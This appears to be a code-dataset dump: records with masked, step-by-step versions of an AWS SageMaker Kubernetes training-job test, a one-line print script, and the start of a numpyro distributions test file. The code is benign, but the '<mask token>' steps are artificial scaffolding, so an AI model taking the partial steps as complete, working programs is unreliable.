assert k8s.wait_on_condition(reference, "ACK.ResourceSynced", "False")
# Assert debugger rule evaluation completed
self._assert_training_rule_eval_status_in_sync(
training_job_name, "DebugRule", reference, cfg.RULE_STATUS_COMPLETED
)
# Assert profiler rule evaluation completed
self._assert_training_rule_eval_status_in_sync(
training_job_name, "ProfilerRule", reference, cfg.RULE_STATUS_COMPLETED
)
assert k8s.wait_on_condition(reference, "ACK.ResourceSynced", "True")
resource_tags = resource["spec"].get("tags", None)
assert_tags_in_sync(training_job_arn, resource_tags)
# Check that you can delete a completed resource from k8s
_, deleted = k8s.delete_custom_resource(reference, cfg.JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)
assert deleted is True
|
normal
|
{
"blob_id": "6f107d0d0328c2445c0e1d0dd10e51227da58129",
"index": 3900,
"step-1": "<mask token>\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n <mask token>\n",
"step-2": "<mask token>\n\n\[email protected](scope='function')\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name('xgboost-trainingjob-debugger', 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements['TRAINING_JOB_NAME'] = resource_name\n reference, _, resource = create_sagemaker_resource(resource_plural=\n RESOURCE_PLURAL, resource_name=resource_name, spec_file=\n 'xgboost_trainingjob_debugger', replacements=replacements)\n assert resource is not None\n yield reference, resource\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str,\n rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type + 'EvaluationStatuses'][0][\n 'RuleEvaluationStatus']\n\n\n<mask token>\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n\n def test_completed(self, xgboost_training_job_debugger):\n reference, resource = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n training_job_name = resource['spec'].get('trainingJobName', None)\n assert training_job_name is not None\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc['TrainingJobArn']\n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n assert training_job_desc['TrainingJobStatus'\n ] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n assert_training_status_in_sync(training_job_name, reference, cfg.\n JOB_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'DebugRule', reference, cfg.RULE_STATUS_COMPLETED)\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'ProfilerRule', reference, cfg.RULE_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'True')\n resource_tags = resource['spec'].get('tags', None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n _, deleted = k8s.delete_custom_resource(reference, cfg.\n JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-3": "<mask token>\n\n\[email protected](scope='function')\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name('xgboost-trainingjob-debugger', 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements['TRAINING_JOB_NAME'] = resource_name\n reference, _, resource = create_sagemaker_resource(resource_plural=\n RESOURCE_PLURAL, resource_name=resource_name, spec_file=\n 'xgboost_trainingjob_debugger', replacements=replacements)\n assert resource is not None\n yield reference, resource\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str,\n rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type + 'EvaluationStatuses'][0][\n 'RuleEvaluationStatus']\n\n\ndef get_training_rule_eval_resource_status(reference: k8s.\n CustomResourceReference, rule_type: str):\n resource = k8s.get_resource(reference)\n resource_status = resource['status'][rule_type + 'EvaluationStatuses'][0][\n 'ruleEvaluationStatus']\n assert resource_status is not None\n return resource_status\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n\n def test_completed(self, xgboost_training_job_debugger):\n reference, resource = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n training_job_name = resource['spec'].get('trainingJobName', None)\n assert training_job_name is not None\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc['TrainingJobArn']\n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n assert training_job_desc['TrainingJobStatus'\n ] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n assert_training_status_in_sync(training_job_name, reference, cfg.\n JOB_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'DebugRule', reference, cfg.RULE_STATUS_COMPLETED)\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'ProfilerRule', reference, cfg.RULE_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'True')\n resource_tags = resource['spec'].get('tags', None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n _, deleted = k8s.delete_custom_resource(reference, cfg.\n JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-4": "<mask token>\nRESOURCE_PLURAL = 'trainingjobs'\n\n\[email protected](scope='function')\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name('xgboost-trainingjob-debugger', 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements['TRAINING_JOB_NAME'] = resource_name\n reference, _, resource = create_sagemaker_resource(resource_plural=\n RESOURCE_PLURAL, resource_name=resource_name, spec_file=\n 'xgboost_trainingjob_debugger', replacements=replacements)\n assert resource is not None\n yield reference, resource\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str,\n rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type + 'EvaluationStatuses'][0][\n 'RuleEvaluationStatus']\n\n\ndef get_training_rule_eval_resource_status(reference: k8s.\n CustomResourceReference, rule_type: str):\n resource = k8s.get_resource(reference)\n resource_status = resource['status'][rule_type + 'EvaluationStatuses'][0][\n 'ruleEvaluationStatus']\n assert resource_status is not None\n return resource_status\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n\n def test_completed(self, xgboost_training_job_debugger):\n reference, resource = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n training_job_name = resource['spec'].get('trainingJobName', None)\n assert training_job_name is not None\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc['TrainingJobArn']\n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n assert training_job_desc['TrainingJobStatus'\n ] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n assert_training_status_in_sync(training_job_name, reference, cfg.\n JOB_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'DebugRule', reference, cfg.RULE_STATUS_COMPLETED)\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'ProfilerRule', reference, cfg.RULE_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'True')\n resource_tags = resource['spec'].get('tags', None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n _, deleted = k8s.delete_custom_resource(reference, cfg.\n JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-5": "# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You may\n# not use this file except in compliance with the License. A copy of the\n# License is located at\n#\n# \t http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"Integration tests for the SageMaker TrainingJob API.\n\"\"\"\n\nimport pytest\nimport logging\n\nfrom acktest.resources import random_suffix_name\nfrom acktest.k8s import resource as k8s\nfrom e2e import (\n service_marker,\n create_sagemaker_resource,\n wait_for_status,\n get_sagemaker_training_job,\n assert_training_status_in_sync,\n assert_tags_in_sync,\n)\nfrom e2e.replacement_values import REPLACEMENT_VALUES\nfrom e2e.common import config as cfg\n\nRESOURCE_PLURAL = \"trainingjobs\"\n\n\[email protected](scope=\"function\")\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name(\"xgboost-trainingjob-debugger\", 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements[\"TRAINING_JOB_NAME\"] = resource_name\n reference, _, resource = create_sagemaker_resource(\n resource_plural=RESOURCE_PLURAL,\n resource_name=resource_name,\n spec_file=\"xgboost_trainingjob_debugger\",\n replacements=replacements,\n )\n assert resource is not None\n\n yield (reference, resource)\n\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str, rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type+\"EvaluationStatuses\"][0][\"RuleEvaluationStatus\"]\n\n\ndef get_training_rule_eval_resource_status(reference: k8s.CustomResourceReference, rule_type: str):\n resource = k8s.get_resource(reference)\n resource_status = resource[\"status\"][rule_type+\"EvaluationStatuses\"][0][\n \"ruleEvaluationStatus\"\n ]\n assert resource_status is not None\n return resource_status\n\n@service_marker\nclass TestTrainingDebuggerJob:\n def _wait_sagemaker_training_rule_eval_status(\n self,\n training_job_name,\n rule_type: str,\n expected_status: str,\n wait_periods: int = 30,\n period_length: int = 30,\n ):\n return wait_for_status(\n expected_status,\n wait_periods,\n period_length,\n get_training_rule_eval_sagemaker_status,\n training_job_name,\n rule_type,\n )\n\n def _wait_resource_training_rule_eval_status(\n self,\n reference: k8s.CustomResourceReference,\n rule_type: str,\n expected_status: str,\n wait_periods: int = 30,\n period_length: int = 30,\n ):\n return wait_for_status(\n expected_status,\n wait_periods,\n period_length,\n get_training_rule_eval_resource_status,\n reference,\n rule_type,\n )\n\n def _assert_training_rule_eval_status_in_sync(\n self, training_job_name, sagemaker_rule_type, reference, expected_status\n ):\n resource_rule_type = sagemaker_rule_type[0].lower() + sagemaker_rule_type[1:]\n assert (\n self._wait_sagemaker_training_rule_eval_status(\n training_job_name, sagemaker_rule_type, expected_status, \n )\n == self._wait_resource_training_rule_eval_status(reference, resource_rule_type, expected_status)\n == expected_status\n )\n\n def test_completed(self, xgboost_training_job_debugger):\n (reference, resource) = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n\n training_job_name = resource[\"spec\"].get(\"trainingJobName\", None)\n assert training_job_name is not None\n\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc[\"TrainingJobArn\"]\n \n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n\n assert training_job_desc[\"TrainingJobStatus\"] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, \"ACK.ResourceSynced\", \"False\")\n\n assert_training_status_in_sync(\n training_job_name, reference, cfg.JOB_STATUS_COMPLETED\n )\n assert k8s.wait_on_condition(reference, \"ACK.ResourceSynced\", \"False\")\n\n # Assert debugger rule evaluation completed\n self._assert_training_rule_eval_status_in_sync(\n training_job_name, \"DebugRule\", reference, cfg.RULE_STATUS_COMPLETED\n )\n \n # Assert profiler rule evaluation completed\n self._assert_training_rule_eval_status_in_sync(\n training_job_name, \"ProfilerRule\", reference, cfg.RULE_STATUS_COMPLETED\n )\n assert k8s.wait_on_condition(reference, \"ACK.ResourceSynced\", \"True\")\n\n resource_tags = resource[\"spec\"].get(\"tags\", None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n\n # Check that you can delete a completed resource from k8s\n _, deleted = k8s.delete_custom_resource(reference, cfg.JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-ids": [
4,
7,
8,
9,
11
]
}
|
[
4,
7,
8,
9,
11
] |
print ("Hello Workls!")
|
normal
|
{
"blob_id": "c52d1c187edb17e85a8e2b47aa6731bc9a41ab1b",
"index": 561,
"step-1": "<mask token>\n",
"step-2": "print('Hello Workls!')\n",
"step-3": "print (\"Hello Workls!\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
from functools import partial
import inspect
from itertools import product
import math
import os
import numpy as np
from numpy.testing import assert_allclose, assert_array_equal
import pytest
import scipy
from scipy.sparse import csr_matrix
import scipy.stats as osp
import jax
from jax import grad, lax, vmap
import jax.numpy as jnp
import jax.random as random
from jax.scipy.special import expit, logsumexp
from jax.scipy.stats import norm as jax_norm, truncnorm as jax_truncnorm
import numpyro.distributions as dist
from numpyro.distributions import (
SineBivariateVonMises,
constraints,
kl_divergence,
transforms,
)
from numpyro.distributions.batch_util import vmap_over
from numpyro.distributions.discrete import _to_probs_bernoulli, _to_probs_multinom
from numpyro.distributions.flows import InverseAutoregressiveTransform
from numpyro.distributions.gof import InvalidTest, auto_goodness_of_fit
from numpyro.distributions.transforms import (
LowerCholeskyAffine,
PermuteTransform,
PowerTransform,
SimplexToOrderedTransform,
SoftplusTransform,
biject_to,
)
from numpyro.distributions.util import (
matrix_to_tril_vec,
multinomial,
signed_stick_breaking_tril,
sum_rightmost,
vec_to_tril_matrix,
)
from numpyro.nn import AutoregressiveNN
TEST_FAILURE_RATE = 2e-5 # For all goodness-of-fit tests.
def my_kron(A, B):
D = A[..., :, None, :, None] * B[..., None, :, None, :]
ds = D.shape
newshape = (*ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1])
return D.reshape(newshape)
def _identity(x):
return x
def _circ_mean(angles):
return jnp.arctan2(
jnp.mean(jnp.sin(angles), axis=0), jnp.mean(jnp.cos(angles), axis=0)
)
def sde_fn1(x, _):
lam = 0.1
sigma2 = 0.1
return lam * x, sigma2
def sde_fn2(xy, _):
tau, a = 2.0, 1.1
x, y = xy[0], xy[1]
dx = tau * (x - x**3.0 / 3.0 + y)
dy = (1.0 / tau) * (a - x)
dxy = jnp.vstack([dx, dy]).reshape(xy.shape)
sigma2 = 0.1
return dxy, sigma2
class T(namedtuple("TestCase", ["jax_dist", "sp_dist", "params"])):
def __new__(cls, jax_dist, *params):
sp_dist = get_sp_dist(jax_dist)
return super(cls, T).__new__(cls, jax_dist, sp_dist, params)
def _mvn_to_scipy(loc, cov, prec, tril):
jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)
mean = jax_dist.mean
cov = jax_dist.covariance_matrix
return osp.multivariate_normal(mean=mean, cov=cov)
def _multivariate_t_to_scipy(df, loc, tril):
if scipy.__version__ < "1.6.0":
pytest.skip(
"Multivariate Student-T distribution is not available in scipy < 1.6"
)
jax_dist = dist.MultivariateStudentT(df, loc, tril)
mean = jax_dist.mean
cov = jax_dist.covariance_matrix
return osp.multivariate_t(loc=mean, shape=cov, df=df)
def _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):
jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)
mean = jax_dist.mean
cov = jax_dist.covariance_matrix
return osp.multivariate_normal(mean=mean, cov=cov)
def _truncnorm_to_scipy(loc, scale, low, high):
if low is None:
a = -np.inf
else:
a = (low - loc) / scale
if high is None:
b = np.inf
else:
b = (high - loc) / scale
return osp.truncnorm(a, b, loc=loc, scale=scale)
def _TruncatedNormal(loc, scale, low, high):
return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)
def _TruncatedCauchy(loc, scale, low, high):
return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)
_TruncatedNormal.arg_constraints = {}
_TruncatedNormal.reparametrized_params = []
_TruncatedNormal.infer_shapes = lambda *args: (lax.broadcast_shapes(*args), ())
class SineSkewedUniform(dist.SineSkewed):
def __init__(self, skewness, **kwargs):
lower, upper = (np.array([-math.pi, -math.pi]), np.array([math.pi, math.pi]))
base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)
super().__init__(base_dist, skewness, **kwargs)
@vmap_over.register
def _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):
return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)
class SineSkewedVonMises(dist.SineSkewed):
def __init__(self, skewness, **kwargs):
von_loc, von_conc = (np.array([0.0]), np.array([1.0]))
base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)
super().__init__(base_dist, skewness, **kwargs)
@vmap_over.register
def _vmap_over_sine_skewed_von_mises(self: SineSkewedVonMises, skewness=None):
return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)
class SineSkewedVonMisesBatched(dist.SineSkewed):
def __init__(self, skewness, **kwargs):
von_loc, von_conc = (np.array([0.0, -1.234]), np.array([1.0, 10.0]))
base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)
super().__init__(base_dist, skewness, **kwargs)
@vmap_over.register
def _vmap_over_sine_skewed_von_mises_batched(
self: SineSkewedVonMisesBatched, skewness=None
):
return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)
class _GaussianMixture(dist.MixtureSameFamily):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, loc, scale):
component_dist = dist.Normal(loc=loc, scale=scale)
mixing_distribution = dist.Categorical(probs=mixing_probs)
super().__init__(
mixing_distribution=mixing_distribution,
component_distribution=component_dist,
)
@property
def loc(self):
return self.component_distribution.loc
@property
def scale(self):
return self.component_distribution.scale
@vmap_over.register
def _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):
component_distribution = vmap_over(
self.component_distribution, loc=loc, scale=scale
)
return vmap_over.dispatch(dist.MixtureSameFamily)(
self, _component_distribution=component_distribution
)
class _Gaussian2DMixture(dist.MixtureSameFamily):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, loc, covariance_matrix):
component_dist = dist.MultivariateNormal(
loc=loc, covariance_matrix=covariance_matrix
)
mixing_distribution = dist.Categorical(probs=mixing_probs)
super().__init__(
mixing_distribution=mixing_distribution,
component_distribution=component_dist,
)
@property
def loc(self):
return self.component_distribution.loc
@property
def covariance_matrix(self):
return self.component_distribution.covariance_matrix
@vmap_over.register
def _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):
component_distribution = vmap_over(self.component_distribution, loc=loc)
return vmap_over.dispatch(dist.MixtureSameFamily)(
self, _component_distribution=component_distribution
)
class _GeneralMixture(dist.MixtureGeneral):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, locs, scales):
component_dists = [
dist.Normal(loc=loc_, scale=scale_) for loc_, scale_ in zip(locs, scales)
]
mixing_distribution = dist.Categorical(probs=mixing_probs)
return super().__init__(
mixing_distribution=mixing_distribution,
component_distributions=component_dists,
)
@property
def locs(self):
# hotfix for vmapping tests, which cannot easily check non-array attributes
return self.component_distributions[0].loc
@property
def scales(self):
return self.component_distributions[0].scale
@vmap_over.register
def _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):
component_distributions = [
vmap_over(d, loc=locs, scale=scales) for d in self.component_distributions
]
return vmap_over.dispatch(dist.MixtureGeneral)(
self, _component_distributions=component_distributions
)
class _General2DMixture(dist.MixtureGeneral):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, locs, covariance_matrices):
component_dists = [
dist.MultivariateNormal(loc=loc_, covariance_matrix=covariance_matrix)
for loc_, covariance_matrix in zip(locs, covariance_matrices)
]
mixing_distribution = dist.Categorical(probs=mixing_probs)
return super().__init__(
mixing_distribution=mixing_distribution,
component_distributions=component_dists,
)
@property
def locs(self):
# hotfix for vmapping tests, which cannot easily check non-array attributes
return self.component_distributions[0].loc
@property
def covariance_matrices(self):
return self.component_distributions[0].covariance_matrix
@vmap_over.register
def _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):
component_distributions = [
vmap_over(d, loc=locs) for d in self.component_distributions
]
return vmap_over.dispatch(dist.MixtureGeneral)(
self, _component_distributions=component_distributions
)
class _ImproperWrapper(dist.ImproperUniform):
def sample(self, key, sample_shape=()):
transform = biject_to(self.support)
prototype_value = jnp.zeros(self.event_shape)
unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))
shape = sample_shape + self.batch_shape + unconstrained_event_shape
unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)
return transform(unconstrained_samples)
class ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):
arg_constraints = {"rate": constraints.positive, "gate_logits": constraints.real}
pytree_data_fields = ("rate",)
def __init__(self, rate, gate_logits, *, validate_args=None):
self.rate = rate
super().__init__(dist.Poisson(rate), gate_logits, validate_args=validate_args)
@vmap_over.register
def _vmap_over_zero_inflated_poisson_logits(
self: ZeroInflatedPoissonLogits, rate=None, gate_logits=None
):
dist_axes = vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(
self,
base_dist=vmap_over(self.base_dist, rate=rate),
gate_logits=gate_logits,
gate=gate_logits,
)
dist_axes.rate = rate
return dist_axes
class SparsePoisson(dist.Poisson):
def __init__(self, rate, *, validate_args=None):
super().__init__(rate, is_sparse=True, validate_args=validate_args)
class FoldedNormal(dist.FoldedDistribution):
arg_constraints = {"loc": constraints.real, "scale": constraints.positive}
def __init__(self, loc, scale, validate_args=None):
self.loc = loc
self.scale = scale
super().__init__(dist.Normal(loc, scale), validate_args=validate_args)
@vmap_over.register
def _vmap_over_folded_normal(self: "FoldedNormal", loc=None, scale=None):
d = vmap_over.dispatch(dist.FoldedDistribution)(
self, base_dist=vmap_over(self.base_dist, loc=loc, scale=scale)
)
d.loc = loc
d.scale = scale
return d
class _SparseCAR(dist.CAR):
reparametrized_params = ["loc", "correlation", "conditional_precision"]
def __init__(
self,
loc,
correlation,
conditional_precision,
adj_matrix,
*,
is_sparse=True,
validate_args=None,
):
super().__init__(
loc,
correlation,
conditional_precision,
adj_matrix,
is_sparse=True,
validate_args=validate_args,
)
_DIST_MAP = {
dist.AsymmetricLaplace: lambda loc, scale, asymmetry: osp.laplace_asymmetric(
asymmetry, loc=loc, scale=scale
),
dist.BernoulliProbs: lambda probs: osp.bernoulli(p=probs),
dist.BernoulliLogits: lambda logits: osp.bernoulli(p=_to_probs_bernoulli(logits)),
dist.Beta: lambda con1, con0: osp.beta(con1, con0),
dist.BetaProportion: lambda mu, kappa: osp.beta(mu * kappa, (1 - mu) * kappa),
dist.BinomialProbs: lambda probs, total_count: osp.binom(n=total_count, p=probs),
dist.BinomialLogits: lambda logits, total_count: osp.binom(
n=total_count, p=_to_probs_bernoulli(logits)
),
dist.Cauchy: lambda loc, scale: osp.cauchy(loc=loc, scale=scale),
dist.Chi2: lambda df: osp.chi2(df),
dist.Dirichlet: lambda conc: osp.dirichlet(conc),
dist.Exponential: lambda rate: osp.expon(scale=jnp.reciprocal(rate)),
dist.Gamma: lambda conc, rate: osp.gamma(conc, scale=1.0 / rate),
dist.GeometricProbs: lambda probs: osp.geom(p=probs, loc=-1),
dist.GeometricLogits: lambda logits: osp.geom(
p=_to_probs_bernoulli(logits), loc=-1
),
dist.Gumbel: lambda loc, scale: osp.gumbel_r(loc=loc, scale=scale),
dist.HalfCauchy: lambda scale: osp.halfcauchy(scale=scale),
dist.HalfNormal: lambda scale: osp.halfnorm(scale=scale),
dist.InverseGamma: lambda conc, rate: osp.invgamma(conc, scale=rate),
dist.Laplace: lambda loc, scale: osp.laplace(loc=loc, scale=scale),
dist.LogNormal: lambda loc, scale: osp.lognorm(s=scale, scale=jnp.exp(loc)),
dist.LogUniform: lambda a, b: osp.loguniform(a, b),
dist.MultinomialProbs: lambda probs, total_count: osp.multinomial(
n=total_count, p=probs
),
dist.MultinomialLogits: lambda logits, total_count: osp.multinomial(
n=total_count, p=_to_probs_multinom(logits)
),
dist.MultivariateNormal: _mvn_to_scipy,
dist.MultivariateStudentT: _multivariate_t_to_scipy,
dist.LowRankMultivariateNormal: _lowrank_mvn_to_scipy,
dist.Normal: lambda loc, scale: osp.norm(loc=loc, scale=scale),
dist.Pareto: lambda scale, alpha: osp.pareto(alpha, scale=scale),
dist.Poisson: lambda rate: osp.poisson(rate),
dist.StudentT: lambda df, loc, scale: osp.t(df=df, loc=loc, scale=scale),
dist.Uniform: lambda a, b: osp.uniform(a, b - a),
dist.Logistic: lambda loc, scale: osp.logistic(loc=loc, scale=scale),
dist.VonMises: lambda loc, conc: osp.vonmises(
loc=np.array(loc, dtype=np.float64), kappa=np.array(conc, dtype=np.float64)
),
dist.Weibull: lambda scale, conc: osp.weibull_min(
c=conc,
scale=scale,
),
_TruncatedNormal: _truncnorm_to_scipy,
}
def get_sp_dist(jax_dist):
classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]
for cls in classes:
if cls in _DIST_MAP:
return _DIST_MAP[cls]
CONTINUOUS = [
T(dist.AsymmetricLaplace, 1.0, 0.5, 1.0),
T(dist.AsymmetricLaplace, np.array([1.0, 2.0]), 2.0, 2.0),
